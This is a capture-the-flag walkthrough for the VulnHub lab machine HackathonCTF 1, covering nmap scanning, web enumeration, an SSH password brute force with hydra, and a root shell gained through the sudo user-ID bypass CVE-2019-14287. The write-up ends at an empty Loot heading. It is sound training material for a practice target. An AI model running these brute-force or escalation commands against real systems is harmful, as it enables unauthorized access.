iLab HackathonCTF 1

 HackathonCTF 1 is a Linux machine, xXX

Download: https://www.vulnhub.com/entry/hackathonctf-1,591/

Source www.daniel-pinto.dev

👀Finding VM's IP

sudo netdiscover -i eth0

finding machine's IP

I like to set environment variables to help me with my scripts. So I set the "ip" variable with machine's IP. You will see references like $ip around.

export ip=192.168.150.136

exporting IP as a env variable

🖥️Scan

Start running a nmap scan searching for all ports (-p-):

nmap -p- -vv -Pn -n $ip -oA 1-nmap/0-initial-probe

Once the results come back,  run nmap again for common scripts (-sC) and service versions (-sV), grepping from result and specifying the ports:

nmap -p$(cat 1-nmap/0-initial-probe.gnmap | grep -oP '\d{2,5}/open/' | awk '{print $1}' FS="/" | xargs | tr ' ' ',') -sC -sV -A -T5 $ip -oA 1-nmap/1-target_ports

Output:

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.2
23/tcp   open  telnet  Linux telnetd
80/tcp   open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 3 disallowed entries
|_/ctf /ftc /sudo
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: 404 Not Found
7223/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 48:98:fc:58:02:9a:73:0b:c8:9a:18:53:00:f3:69:c7 (DSA)
|   2048 71:8f:f7:f7:23:7f:e6:73:f4:2b:a9:51:de:8f:d1:8d (RSA)
|   256 93:62:fe:09:7c:50:8a:1d:19:2f:4d:95:0f:fa:2c:34 (ECDSA)
|_  256 48:6e:82:29:06:a9:77:5f:08:f2:34:df:60:06:a2:cc (ED25519)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
123456789101112131415

📑Enumeration

On 21

• Anonymous access is disabled
• vsftpd 3.0.2

On 23

• Telnet service running

On 80

• robots.txt returned 3 directories: /ctf /ftc /sudo
• Directories returned NotFound
• Apache/2.4.7 (Ubuntu)

nmap missed some base64 string

echo c3NoLWJydXRlZm9yY2Utc3Vkb2l0Cg== | base64 -d
ssh-bruteforce-sudoit
12

/ftc.html

#117
#115
#101
#32
#114
#111
#99
#107
#121
#111
#117
#46
#116
#120
#116
123456789101112131415

• Still not sure what that means...

/sudo.html

#uname : test

🔐Service Exploited

Brute force using the username "test" found on sudo.html comment.

hydra $ip -s 7223 ssh -l test -P /usr/share/wordlists/rockyou.txt

🔏Priv Escalation

First thing to check was what commands could we sudo.

"(ALL, !root) ALL" means we can execute sudo commands as any user than root like:

We can't execute as root or specifing -u#0.

Joe Vennix from Apple Information Security found that the function fails to parse all values correctly and when giving the parameter user id “-1” or its unsigned number “4294967295”, the command will run as root, bypassing the security policy entry we set in the example above (CVE-2019-14287).

So to get a root shell, we can execute this command:

sudo -u#-1 /bin/bash

💰Loot